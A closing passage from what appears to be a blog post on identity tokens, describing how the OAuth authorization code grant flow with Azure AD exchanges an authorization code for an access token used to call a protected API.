Auth code grant flow is where a user is asked to sign-in at the authorization server (Azure AD). This time, however, instead of an ID token being returned, an authorization code is returned. A second request is then made to the authorization server with the authorization code, but this time an access token is returned. With the access token, a protected API can then be accessed.

Wrap up

I hope you found this useful and understand more around what tokens are, the different types of tokens and how they are used.

« Older Entries

Next Entries »